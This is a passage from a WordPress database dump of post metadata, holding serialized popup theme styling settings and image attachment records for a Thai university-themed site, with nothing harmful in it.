(15246, 6436, '_edit_lock', '1578365529:14'),
(15247, 6436, '_edit_last', '14'),
(15248, 6436, '_hide_featured', NULL),
(15308, 6182, 'popup_theme_data_version', '3'),
(15309, 6182, 'popup_theme_settings', 'a:65:{s:24:\"overlay_background_color\";s:7:\"#ffffff\";s:26:\"overlay_background_opacity\";s:2:\"34\";s:17:\"container_padding\";s:2:\"15\";s:26:\"container_background_color\";s:7:\"#ffffff\";s:28:\"container_background_opacity\";s:3:\"100\";s:22:\"container_border_style\";s:4:\"none\";s:22:\"container_border_color\";s:7:\"#000000\";s:22:\"container_border_width\";s:1:\"1\";s:23:\"container_border_radius\";s:2:\"13\";s:25:\"container_boxshadow_inset\";s:2:\"no\";s:30:\"container_boxshadow_horizontal\";s:2:\"17\";s:28:\"container_boxshadow_vertical\";s:2:\"10\";s:24:\"container_boxshadow_blur\";s:1:\"3\";s:26:\"container_boxshadow_spread\";s:2:\"-1\";s:25:\"container_boxshadow_color\";s:7:\"#020202\";s:27:\"container_boxshadow_opacity\";s:2:\"48\";s:16:\"title_font_color\";s:7:\"#000000\";s:17:\"title_line_height\";s:2:\"30\";s:15:\"title_font_size\";s:2:\"35\";s:17:\"title_font_family\";s:7:\"inherit\";s:17:\"title_font_weight\";s:0:\"\";s:16:\"title_font_style\";s:0:\"\";s:16:\"title_text_align\";s:4:\"left\";s:27:\"title_textshadow_horizontal\";s:1:\"4\";s:25:\"title_textshadow_vertical\";s:1:\"2\";s:21:\"title_textshadow_blur\";s:1:\"3\";s:22:\"title_textshadow_color\";s:7:\"#020202\";s:24:\"title_textshadow_opacity\";s:2:\"51\";s:18:\"content_font_color\";s:7:\"#8c8c8c\";s:19:\"content_font_family\";s:7:\"inherit\";s:19:\"content_font_weight\";s:0:\"\";s:18:\"content_font_style\";s:0:\"\";s:10:\"close_text\";s:5:\"CLOSE\";s:14:\"close_location\";s:8:\"topright\";s:18:\"close_position_top\";s:1:\"0\";s:19:\"close_position_left\";s:1:\"0\";s:21:\"close_position_bottom\";s:1:\"0\";s:20:\"close_position_right\";s:1:\"0\";s:13:\"close_padding\";s:1:\"8\";s:12:\"close_height\";s:1:\"0\";s:11:\"close_width\";s:1:\"0\";s:22:\"close_background_color\";s:7:\"#00b7cd\";s:24:\"close_background_opacity\";s:3:\"100\";s:16:\"close_font_color\";s:7:\"#ffffff\";s:17:\"close_line_height\";s:2:\"14\";s:15:\"close_font_size\";s:2:\"12\";s:17:\"close_font_family\";s:7:\"inherit\";s:17:\"close_font_weight\";s:0:\"\";s:16:\"close_font_style\";s:0:\"\";s:18:\"close_border_style\";s:4:\"none\";s:18:\"close_border_color\";s:7:\"#ffffff\";s:18:\"close_border_width\";s:1:\"1\";s:19:\"close_border_radius\";s:1:\"0\";s:21:\"close_boxshadow_inset\";s:2:\"no\";s:26:\"close_boxshadow_horizontal\";s:1:\"0\";s:24:\"close_boxshadow_vertical\";s:1:\"0\";s:20:\"close_boxshadow_blur\";s:1:\"0\";s:22:\"close_boxshadow_spread\";s:1:\"0\";s:21:\"close_boxshadow_color\";s:7:\"#020202\";s:23:\"close_boxshadow_opacity\";s:2:\"23\";s:27:\"close_textshadow_horizontal\";s:1:\"0\";s:25:\"close_textshadow_vertical\";s:1:\"0\";s:21:\"close_textshadow_blur\";s:1:\"0\";s:22:\"close_textshadow_color\";s:7:\"#000000\";s:24:\"close_textshadow_opacity\";s:2:\"23\";}'),
(15310, 898, 'popup_theme_data_version', '3'),
(15311, 898, 'popup_theme_settings', 'a:65:{s:24:\"overlay_background_color\";s:7:\"#ffffff\";s:26:\"overlay_background_opacity\";s:3:\"100\";s:17:\"container_padding\";s:2:\"18\";s:26:\"container_background_color\";s:7:\"#7bb7ad\";s:28:\"container_background_opacity\";s:3:\"100\";s:22:\"container_border_style\";s:5:\"solid\";s:22:\"container_border_color\";s:7:\"#143f0a\";s:22:\"container_border_width\";s:1:\"3\";s:23:\"container_border_radius\";s:1:\"0\";s:25:\"container_boxshadow_inset\";s:2:\"no\";s:30:\"container_boxshadow_horizontal\";s:1:\"1\";s:28:\"container_boxshadow_vertical\";s:1:\"1\";s:24:\"container_boxshadow_blur\";s:1:\"3\";s:26:\"container_boxshadow_spread\";s:1:\"0\";s:25:\"container_boxshadow_color\";s:7:\"#020202\";s:27:\"container_boxshadow_opacity\";s:2:\"23\";s:16:\"title_font_color\";s:7:\"#000000\";s:17:\"title_line_height\";s:2:\"36\";s:15:\"title_font_size\";s:2:\"32\";s:17:\"title_font_family\";s:7:\"inherit\";s:17:\"title_font_weight\";s:0:\"\";s:16:\"title_font_style\";s:0:\"\";s:16:\"title_text_align\";s:4:\"left\";s:27:\"title_textshadow_horizontal\";s:1:\"0\";s:25:\"title_textshadow_vertical\";s:1:\"0\";s:21:\"title_textshadow_blur\";s:1:\"0\";s:22:\"title_textshadow_color\";s:7:\"#020202\";s:24:\"title_textshadow_opacity\";s:2:\"23\";s:18:\"content_font_color\";s:7:\"#8c8c8c\";s:19:\"content_font_family\";s:7:\"inherit\";s:19:\"content_font_weight\";s:0:\"\";s:18:\"content_font_style\";s:0:\"\";s:10:\"close_text\";s:5:\"CLOSE\";s:14:\"close_location\";s:8:\"topright\";s:18:\"close_position_top\";s:1:\"0\";s:19:\"close_position_left\";s:1:\"0\";s:21:\"close_position_bottom\";s:1:\"0\";s:20:\"close_position_right\";s:1:\"0\";s:13:\"close_padding\";s:1:\"8\";s:12:\"close_height\";s:1:\"0\";s:11:\"close_width\";s:1:\"0\";s:22:\"close_background_color\";s:7:\"#00b7cd\";s:24:\"close_background_opacity\";s:3:\"100\";s:16:\"close_font_color\";s:7:\"#ffffff\";s:17:\"close_line_height\";s:2:\"14\";s:15:\"close_font_size\";s:2:\"12\";s:17:\"close_font_family\";s:7:\"inherit\";s:17:\"close_font_weight\";s:0:\"\";s:16:\"close_font_style\";s:0:\"\";s:18:\"close_border_style\";s:4:\"none\";s:18:\"close_border_color\";s:7:\"#ffffff\";s:18:\"close_border_width\";s:1:\"1\";s:19:\"close_border_radius\";s:1:\"0\";s:21:\"close_boxshadow_inset\";s:2:\"no\";s:26:\"close_boxshadow_horizontal\";s:1:\"0\";s:24:\"close_boxshadow_vertical\";s:1:\"0\";s:20:\"close_boxshadow_blur\";s:1:\"0\";s:22:\"close_boxshadow_spread\";s:1:\"0\";s:21:\"close_boxshadow_color\";s:7:\"#020202\";s:23:\"close_boxshadow_opacity\";s:2:\"23\";s:27:\"close_textshadow_horizontal\";s:1:\"0\";s:25:\"close_textshadow_vertical\";s:1:\"0\";s:21:\"close_textshadow_blur\";s:1:\"0\";s:22:\"close_textshadow_color\";s:7:\"#000000\";s:24:\"close_textshadow_opacity\";s:2:\"23\";}'),
(15312, 899, 'popup_theme_data_version', '3'),
(15313, 899, 'popup_theme_settings', 'a:65:{s:24:\"overlay_background_color\";s:7:\"#000000\";s:26:\"overlay_background_opacity\";s:2:\"60\";s:17:\"container_padding\";s:2:\"18\";s:26:\"container_background_color\";s:7:\"#ffffff\";s:28:\"container_background_opacity\";s:3:\"100\";s:22:\"container_border_style\";s:5:\"solid\";s:22:\"container_border_color\";s:7:\"#000000\";s:22:\"container_border_width\";s:1:\"8\";s:23:\"container_border_radius\";s:1:\"3\";s:25:\"container_boxshadow_inset\";s:2:\"no\";s:30:\"container_boxshadow_horizontal\";s:1:\"0\";s:28:\"container_boxshadow_vertical\";s:1:\"0\";s:24:\"container_boxshadow_blur\";s:2:\"30\";s:26:\"container_boxshadow_spread\";s:1:\"0\";s:25:\"container_boxshadow_color\";s:7:\"#020202\";s:27:\"container_boxshadow_opacity\";s:3:\"100\";s:16:\"title_font_color\";s:7:\"#000000\";s:17:\"title_line_height\";s:2:\"36\";s:15:\"title_font_size\";s:2:\"32\";s:17:\"title_font_family\";s:7:\"inherit\";s:17:\"title_font_weight\";s:0:\"\";s:16:\"title_font_style\";s:0:\"\";s:16:\"title_text_align\";s:4:\"left\";s:27:\"title_textshadow_horizontal\";s:1:\"0\";s:25:\"title_textshadow_vertical\";s:1:\"0\";s:21:\"title_textshadow_blur\";s:1:\"0\";s:22:\"title_textshadow_color\";s:7:\"#020202\";s:24:\"title_textshadow_opacity\";s:2:\"23\";s:18:\"content_font_color\";s:7:\"#000000\";s:19:\"content_font_family\";s:7:\"inherit\";s:19:\"content_font_weight\";s:0:\"\";s:18:\"content_font_style\";s:0:\"\";s:10:\"close_text\";s:2:\"×\";s:14:\"close_location\";s:8:\"topright\";s:18:\"close_position_top\";s:3:\"-24\";s:19:\"close_position_left\";s:1:\"0\";s:21:\"close_position_bottom\";s:1:\"0\";s:20:\"close_position_right\";s:3:\"-24\";s:13:\"close_padding\";s:1:\"0\";s:12:\"close_height\";s:2:\"30\";s:11:\"close_width\";s:2:\"30\";s:22:\"close_background_color\";s:7:\"#000000\";s:24:\"close_background_opacity\";s:3:\"100\";s:16:\"close_font_color\";s:7:\"#ffffff\";s:17:\"close_line_height\";s:2:\"26\";s:15:\"close_font_size\";s:2:\"24\";s:17:\"close_font_family\";s:7:\"inherit\";s:17:\"close_font_weight\";s:0:\"\";s:16:\"close_font_style\";s:0:\"\";s:18:\"close_border_style\";s:5:\"solid\";s:18:\"close_border_color\";s:7:\"#ffffff\";s:18:\"close_border_width\";s:1:\"2\";s:19:\"close_border_radius\";s:2:\"30\";s:21:\"close_boxshadow_inset\";s:2:\"no\";s:26:\"close_boxshadow_horizontal\";s:1:\"0\";s:24:\"close_boxshadow_vertical\";s:1:\"0\";s:20:\"close_boxshadow_blur\";s:2:\"15\";s:22:\"close_boxshadow_spread\";s:1:\"1\";s:21:\"close_boxshadow_color\";s:7:\"#020202\";s:23:\"close_boxshadow_opacity\";s:2:\"75\";s:27:\"close_textshadow_horizontal\";s:1:\"0\";s:25:\"close_textshadow_vertical\";s:1:\"0\";s:21:\"close_textshadow_blur\";s:1:\"0\";s:22:\"close_textshadow_color\";s:7:\"#000000\";s:24:\"close_textshadow_opacity\";s:2:\"23\";}'),
(15314, 900, 'popup_theme_data_version', '3'),
(15315, 900, 'popup_theme_settings', 'a:65:{s:24:\"overlay_background_color\";s:7:\"#000000\";s:26:\"overlay_background_opacity\";s:2:\"70\";s:17:\"container_padding\";s:2:\"28\";s:26:\"container_background_color\";s:7:\"#ffffff\";s:28:\"container_background_opacity\";s:3:\"100\";s:22:\"container_border_style\";s:4:\"none\";s:22:\"container_border_color\";s:7:\"#000000\";s:22:\"container_border_width\";s:1:\"1\";s:23:\"container_border_radius\";s:1:\"5\";s:25:\"container_boxshadow_inset\";s:2:\"no\";s:30:\"container_boxshadow_horizontal\";s:1:\"0\";s:28:\"container_boxshadow_vertical\";s:2:\"10\";s:24:\"container_boxshadow_blur\";s:2:\"25\";s:26:\"container_boxshadow_spread\";s:1:\"4\";s:25:\"container_boxshadow_color\";s:7:\"#020202\";s:27:\"container_boxshadow_opacity\";s:2:\"50\";s:16:\"title_font_color\";s:7:\"#315b7c\";s:17:\"title_line_height\";s:2:\"36\";s:15:\"title_font_size\";s:2:\"34\";s:17:\"title_font_family\";s:7:\"inherit\";s:17:\"title_font_weight\";s:0:\"\";s:16:\"title_font_style\";s:0:\"\";s:16:\"title_text_align\";s:4:\"left\";s:27:\"title_textshadow_horizontal\";s:1:\"0\";s:25:\"title_textshadow_vertical\";s:1:\"0\";s:21:\"title_textshadow_blur\";s:1:\"0\";s:22:\"title_textshadow_color\";s:7:\"#020202\";s:24:\"title_textshadow_opacity\";s:2:\"23\";s:18:\"content_font_color\";s:7:\"#2d2d2d\";s:19:\"content_font_family\";s:7:\"inherit\";s:19:\"content_font_weight\";s:0:\"\";s:18:\"content_font_style\";s:0:\"\";s:10:\"close_text\";s:2:\"×\";s:14:\"close_location\";s:8:\"topright\";s:18:\"close_position_top\";s:1:\"8\";s:19:\"close_position_left\";s:1:\"0\";s:21:\"close_position_bottom\";s:1:\"0\";s:20:\"close_position_right\";s:1:\"8\";s:13:\"close_padding\";s:1:\"4\";s:12:\"close_height\";s:2:\"28\";s:11:\"close_width\";s:2:\"28\";s:22:\"close_background_color\";s:7:\"#315b7c\";s:24:\"close_background_opacity\";s:3:\"100\";s:16:\"close_font_color\";s:7:\"#ffffff\";s:17:\"close_line_height\";s:2:\"20\";s:15:\"close_font_size\";s:2:\"20\";s:17:\"close_font_family\";s:7:\"inherit\";s:17:\"close_font_weight\";s:0:\"\";s:16:\"close_font_style\";s:0:\"\";s:18:\"close_border_style\";s:4:\"none\";s:18:\"close_border_color\";s:7:\"#ffffff\";s:18:\"close_border_width\";s:1:\"1\";s:19:\"close_border_radius\";s:2:\"42\";s:21:\"close_boxshadow_inset\";s:2:\"no\";s:26:\"close_boxshadow_horizontal\";s:1:\"0\";s:24:\"close_boxshadow_vertical\";s:1:\"0\";s:20:\"close_boxshadow_blur\";s:1:\"0\";s:22:\"close_boxshadow_spread\";s:1:\"0\";s:21:\"close_boxshadow_color\";s:7:\"#020202\";s:23:\"close_boxshadow_opacity\";s:2:\"23\";s:27:\"close_textshadow_horizontal\";s:1:\"0\";s:25:\"close_textshadow_vertical\";s:1:\"0\";s:21:\"close_textshadow_blur\";s:1:\"0\";s:22:\"close_textshadow_color\";s:7:\"#000000\";s:24:\"close_textshadow_opacity\";s:2:\"23\";}'),
(15316, 901, 'popup_theme_data_version', '3'),
(15317, 901, 'popup_theme_settings', 'a:65:{s:24:\"overlay_background_color\";s:7:\"#000000\";s:26:\"overlay_background_opacity\";s:2:\"75\";s:17:\"container_padding\";s:2:\"30\";s:26:\"container_background_color\";s:7:\"#ffffff\";s:28:\"container_background_opacity\";s:3:\"100\";s:22:\"container_border_style\";s:5:\"solid\";s:22:\"container_border_color\";s:7:\"#81d742\";s:22:\"container_border_width\";s:2:\"14\";s:23:\"container_border_radius\";s:2:\"80\";s:25:\"container_boxshadow_inset\";s:2:\"no\";s:30:\"container_boxshadow_horizontal\";s:1:\"0\";s:28:\"container_boxshadow_vertical\";s:1:\"0\";s:24:\"container_boxshadow_blur\";s:1:\"0\";s:26:\"container_boxshadow_spread\";s:1:\"0\";s:25:\"container_boxshadow_color\";s:7:\"#020202\";s:27:\"container_boxshadow_opacity\";s:1:\"0\";s:16:\"title_font_color\";s:7:\"#2d2d2d\";s:17:\"title_line_height\";s:2:\"36\";s:15:\"title_font_size\";s:2:\"32\";s:17:\"title_font_family\";s:10:\"Montserrat\";s:17:\"title_font_weight\";s:0:\"\";s:16:\"title_font_style\";s:0:\"\";s:16:\"title_text_align\";s:4:\"left\";s:27:\"title_textshadow_horizontal\";s:1:\"0\";s:25:\"title_textshadow_vertical\";s:1:\"0\";s:21:\"title_textshadow_blur\";s:1:\"0\";s:22:\"title_textshadow_color\";s:7:\"#020202\";s:24:\"title_textshadow_opacity\";s:2:\"23\";s:18:\"content_font_color\";s:7:\"#2d2d2d\";s:19:\"content_font_family\";s:7:\"inherit\";s:19:\"content_font_weight\";s:0:\"\";s:18:\"content_font_style\";s:0:\"\";s:10:\"close_text\";s:2:\"×\";s:14:\"close_location\";s:8:\"topright\";s:18:\"close_position_top\";s:3:\"-30\";s:19:\"close_position_left\";s:3:\"-30\";s:21:\"close_position_bottom\";s:1:\"0\";s:20:\"close_position_right\";s:3:\"-30\";s:13:\"close_padding\";s:1:\"0\";s:12:\"close_height\";s:1:\"0\";s:11:\"close_width\";s:1:\"0\";s:22:\"close_background_color\";s:7:\"#ffffff\";s:24:\"close_background_opacity\";s:3:\"100\";s:16:\"close_font_color\";s:7:\"#2d2d2d\";s:17:\"close_line_height\";s:2:\"28\";s:15:\"close_font_size\";s:2:\"32\";s:17:\"close_font_family\";s:7:\"inherit\";s:17:\"close_font_weight\";s:0:\"\";s:16:\"close_font_style\";s:0:\"\";s:18:\"close_border_style\";s:4:\"none\";s:18:\"close_border_color\";s:7:\"#ffffff\";s:18:\"close_border_width\";s:1:\"1\";s:19:\"close_border_radius\";s:2:\"28\";s:21:\"close_boxshadow_inset\";s:2:\"no\";s:26:\"close_boxshadow_horizontal\";s:1:\"0\";s:24:\"close_boxshadow_vertical\";s:1:\"0\";s:20:\"close_boxshadow_blur\";s:1:\"0\";s:22:\"close_boxshadow_spread\";s:1:\"0\";s:21:\"close_boxshadow_color\";s:7:\"#020202\";s:23:\"close_boxshadow_opacity\";s:2:\"23\";s:27:\"close_textshadow_horizontal\";s:1:\"0\";s:25:\"close_textshadow_vertical\";s:1:\"0\";s:21:\"close_textshadow_blur\";s:1:\"0\";s:22:\"close_textshadow_color\";s:7:\"#000000\";s:24:\"close_textshadow_opacity\";s:2:\"23\";}'),
(15318, 902, 'popup_theme_data_version', '3'),
(15319, 902, 'popup_theme_settings', 'a:65:{s:24:\"overlay_background_color\";s:7:\"#000000\";s:26:\"overlay_background_opacity\";s:2:\"50\";s:17:\"container_padding\";s:2:\"18\";s:26:\"container_background_color\";s:7:\"#1e73be\";s:28:\"container_background_opacity\";s:3:\"100\";s:22:\"container_border_style\";s:4:\"none\";s:22:\"container_border_color\";s:7:\"#000000\";s:22:\"container_border_width\";s:1:\"1\";s:23:\"container_border_radius\";s:1:\"0\";s:25:\"container_boxshadow_inset\";s:2:\"no\";s:30:\"container_boxshadow_horizontal\";s:1:\"0\";s:28:\"container_boxshadow_vertical\";s:2:\"10\";s:24:\"container_boxshadow_blur\";s:2:\"25\";s:26:\"container_boxshadow_spread\";s:1:\"0\";s:25:\"container_boxshadow_color\";s:7:\"#020202\";s:27:\"container_boxshadow_opacity\";s:2:\"50\";s:16:\"title_font_color\";s:7:\"#ffffff\";s:17:\"title_line_height\";s:2:\"28\";s:15:\"title_font_size\";s:2:\"26\";s:17:\"title_font_family\";s:10:\"Sans-Serif\";s:17:\"title_font_weight\";s:0:\"\";s:16:\"title_font_style\";s:0:\"\";s:16:\"title_text_align\";s:4:\"left\";s:27:\"title_textshadow_horizontal\";s:1:\"0\";s:25:\"title_textshadow_vertical\";s:1:\"0\";s:21:\"title_textshadow_blur\";s:1:\"0\";s:22:\"title_textshadow_color\";s:7:\"#020202\";s:24:\"title_textshadow_opacity\";s:2:\"23\";s:18:\"content_font_color\";s:7:\"#ffffff\";s:19:\"content_font_family\";s:7:\"inherit\";s:19:\"content_font_weight\";s:0:\"\";s:18:\"content_font_style\";s:0:\"\";s:10:\"close_text\";s:2:\"×\";s:14:\"close_location\";s:8:\"topright\";s:18:\"close_position_top\";s:1:\"0\";s:19:\"close_position_left\";s:1:\"0\";s:21:\"close_position_bottom\";s:1:\"0\";s:20:\"close_position_right\";s:1:\"0\";s:13:\"close_padding\";s:1:\"0\";s:12:\"close_height\";s:2:\"24\";s:11:\"close_width\";s:2:\"24\";s:22:\"close_background_color\";s:7:\"#eeee22\";s:24:\"close_background_opacity\";s:3:\"100\";s:16:\"close_font_color\";s:7:\"#1e73be\";s:17:\"close_line_height\";s:2:\"24\";s:15:\"close_font_size\";s:2:\"32\";s:17:\"close_font_family\";s:7:\"inherit\";s:17:\"close_font_weight\";s:0:\"\";s:16:\"close_font_style\";s:0:\"\";s:18:\"close_border_style\";s:4:\"none\";s:18:\"close_border_color\";s:7:\"#ffffff\";s:18:\"close_border_width\";s:1:\"1\";s:19:\"close_border_radius\";s:1:\"0\";s:21:\"close_boxshadow_inset\";s:2:\"no\";s:26:\"close_boxshadow_horizontal\";s:2:\"-1\";s:24:\"close_boxshadow_vertical\";s:1:\"1\";s:20:\"close_boxshadow_blur\";s:1:\"1\";s:22:\"close_boxshadow_spread\";s:1:\"0\";s:21:\"close_boxshadow_color\";s:7:\"#020202\";s:23:\"close_boxshadow_opacity\";s:2:\"10\";s:27:\"close_textshadow_horizontal\";s:2:\"-1\";s:25:\"close_textshadow_vertical\";s:1:\"1\";s:21:\"close_textshadow_blur\";s:1:\"1\";s:22:\"close_textshadow_color\";s:7:\"#000000\";s:24:\"close_textshadow_opacity\";s:2:\"10\";}'),
(15320, 903, 'popup_theme_data_version', '3'),
(15321, 903, 'popup_theme_settings', 'a:65:{s:24:\"overlay_background_color\";s:7:\"#ffffff\";s:26:\"overlay_background_opacity\";s:2:\"50\";s:17:\"container_padding\";s:2:\"18\";s:26:\"container_background_color\";s:7:\"#fffbef\";s:28:\"container_background_opacity\";s:3:\"100\";s:22:\"container_border_style\";s:6:\"outset\";s:22:\"container_border_color\";s:7:\"#dd3333\";s:22:\"container_border_width\";s:2:\"20\";s:23:\"container_border_radius\";s:1:\"0\";s:25:\"container_boxshadow_inset\";s:3:\"yes\";s:30:\"container_boxshadow_horizontal\";s:1:\"1\";s:28:\"container_boxshadow_vertical\";s:1:\"1\";s:24:\"container_boxshadow_blur\";s:1:\"3\";s:26:\"container_boxshadow_spread\";s:1:\"0\";s:25:\"container_boxshadow_color\";s:7:\"#020202\";s:27:\"container_boxshadow_opacity\";s:2:\"97\";s:16:\"title_font_color\";s:7:\"#000000\";s:17:\"title_line_height\";s:2:\"36\";s:15:\"title_font_size\";s:2:\"32\";s:17:\"title_font_family\";s:7:\"inherit\";s:17:\"title_font_weight\";s:0:\"\";s:16:\"title_font_style\";s:0:\"\";s:16:\"title_text_align\";s:4:\"left\";s:27:\"title_textshadow_horizontal\";s:1:\"0\";s:25:\"title_textshadow_vertical\";s:1:\"0\";s:21:\"title_textshadow_blur\";s:1:\"0\";s:22:\"title_textshadow_color\";s:7:\"#020202\";s:24:\"title_textshadow_opacity\";s:2:\"23\";s:18:\"content_font_color\";s:7:\"#2d2d2d\";s:19:\"content_font_family\";s:7:\"inherit\";s:19:\"content_font_weight\";s:0:\"\";s:18:\"content_font_style\";s:0:\"\";s:10:\"close_text\";s:2:\"×\";s:14:\"close_location\";s:8:\"topright\";s:18:\"close_position_top\";s:3:\"-20\";s:19:\"close_position_left\";s:3:\"-20\";s:21:\"close_position_bottom\";s:1:\"0\";s:20:\"close_position_right\";s:3:\"-20\";s:13:\"close_padding\";s:1:\"0\";s:12:\"close_height\";s:2:\"20\";s:11:\"close_width\";s:2:\"20\";s:22:\"close_background_color\";s:7:\"#000000\";s:24:\"close_background_opacity\";s:2:\"55\";s:16:\"close_font_color\";s:7:\"#ffffff\";s:17:\"close_line_height\";s:2:\"20\";s:15:\"close_font_size\";s:2:\"20\";s:17:\"close_font_family\";s:4:\"Acme\";s:17:\"close_font_weight\";s:0:\"\";s:16:\"close_font_style\";s:0:\"\";s:18:\"close_border_style\";s:4:\"none\";s:18:\"close_border_color\";s:7:\"#ffffff\";s:18:\"close_border_width\";s:1:\"1\";s:19:\"close_border_radius\";s:1:\"0\";s:21:\"close_boxshadow_inset\";s:2:\"no\";s:26:\"close_boxshadow_horizontal\";s:1:\"0\";s:24:\"close_boxshadow_vertical\";s:1:\"0\";s:20:\"close_boxshadow_blur\";s:1:\"0\";s:22:\"close_boxshadow_spread\";s:1:\"0\";s:21:\"close_boxshadow_color\";s:7:\"#020202\";s:23:\"close_boxshadow_opacity\";s:2:\"23\";s:27:\"close_textshadow_horizontal\";s:1:\"0\";s:25:\"close_textshadow_vertical\";s:1:\"0\";s:21:\"close_textshadow_blur\";s:1:\"0\";s:22:\"close_textshadow_color\";s:7:\"#000000\";s:24:\"close_textshadow_opacity\";s:2:\"23\";}'),
(15324, 6458, '_wp_attached_file', '2019/12/398812.jpg'),
(15325, 6458, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1522;s:6:\"height\";i:1076;s:4:\"file\";s:18:\"2019/12/398812.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"398812-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"398812-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"398812-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"398812-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"398812-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15331, 6463, '_wp_attached_file', '2019/12/รับสมัครสอบ.png'),
(15332, 6463, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1098;s:6:\"height\";i:673;s:4:\"file\";s:45:\"2019/12/รับสมัครสอบ.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"รับสมัครสอบ-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"รับสมัครสอบ-300x184.png\";s:5:\"width\";i:300;s:6:\"height\";i:184;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:45:\"รับสมัครสอบ-768x471.png\";s:5:\"width\";i:768;s:6:\"height\";i:471;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:46:\"รับสมัครสอบ-1024x628.png\";s:5:\"width\";i:1024;s:6:\"height\";i:628;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:45:\"รับสมัครสอบ-400x245.png\";s:5:\"width\";i:400;s:6:\"height\";i:245;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15333, 6469, '_wp_attached_file', '2019/12/รับสมัครสอบ-1.png'),
(15334, 6469, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1098;s:6:\"height\";i:673;s:4:\"file\";s:47:\"2019/12/รับสมัครสอบ-1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:47:\"รับสมัครสอบ-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:47:\"รับสมัครสอบ-1-300x184.png\";s:5:\"width\";i:300;s:6:\"height\";i:184;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:47:\"รับสมัครสอบ-1-768x471.png\";s:5:\"width\";i:768;s:6:\"height\";i:471;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:48:\"รับสมัครสอบ-1-1024x628.png\";s:5:\"width\";i:1024;s:6:\"height\";i:628;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:47:\"รับสมัครสอบ-1-400x245.png\";s:5:\"width\";i:400;s:6:\"height\";i:245;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15335, 6472, '_wp_attached_file', '2019/12/รับสมัครสอบ-2.png'),
(15336, 6472, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1098;s:6:\"height\";i:673;s:4:\"file\";s:47:\"2019/12/รับสมัครสอบ-2.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:47:\"รับสมัครสอบ-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:47:\"รับสมัครสอบ-2-300x184.png\";s:5:\"width\";i:300;s:6:\"height\";i:184;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:47:\"รับสมัครสอบ-2-768x471.png\";s:5:\"width\";i:768;s:6:\"height\";i:471;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:48:\"รับสมัครสอบ-2-1024x628.png\";s:5:\"width\";i:1024;s:6:\"height\";i:628;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:47:\"รับสมัครสอบ-2-400x245.png\";s:5:\"width\";i:400;s:6:\"height\";i:245;s:9:\"mime-type\"